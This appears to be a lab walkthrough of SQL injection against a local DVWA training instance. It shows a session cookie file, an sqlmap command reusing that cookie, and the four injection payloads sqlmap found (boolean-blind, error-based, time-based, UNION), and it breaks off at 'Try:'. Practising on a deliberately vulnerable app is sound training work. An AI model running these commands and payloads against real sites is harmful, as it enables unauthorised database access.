you have security and PHPSESSID in it
cookie.example
# Netscape HTTP Cookie File
# <https://curl.se/docs/http-cookies.html>
# This file was generated by libcurl! Edit at your own risk.
#HttpOnly_dvwa.localtest FALSE / FALSE 0 security low
#HttpOnly_dvwa.localtest FALSE / FALSE 0 PHPSESSID 40960938862d71bc6784707596f3ea7b
then use it in sqlmap for session
For better reading, we change parameter order from ?id=1&Submit=Submit to ?Submit=Submit&id=1
sqlmap -u "<http://dvwa.localtest/vulnerabilities/sqli/?&Submit=Submit&id=1>" \\
-p id \\
--dbms MySQL \\
--cookie="PHPSESSID=40960938862d71bc6784707596f3ea7b;security=low" \\
--flush-session
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: &Submit=Submit&id=1' OR NOT 9429=9429#
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: &Submit=Submit&id=1' AND GTID_SUBSET(CONCAT(0x717a717871,(SELECT (ELT(4029=4029,1))),0x71766a7871),4029)-- OMXo
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: &Submit=Submit&id=1' AND (SELECT 5372 FROM (SELECT(SLEEP(5)))ETkC)-- HPiV
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: &Submit=Submit&id=1' UNION ALL SELECT CONCAT(0x717a717871,0x73734746736a4f4144504b775242724f7763485563586c4f594c73447a436a594d49724e7a5a6475,0x71766a7871),NULL#
---
[21:02:46] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.19.2, PHP 7.1.33
back-end DBMS: MySQL >= 5.6
Try: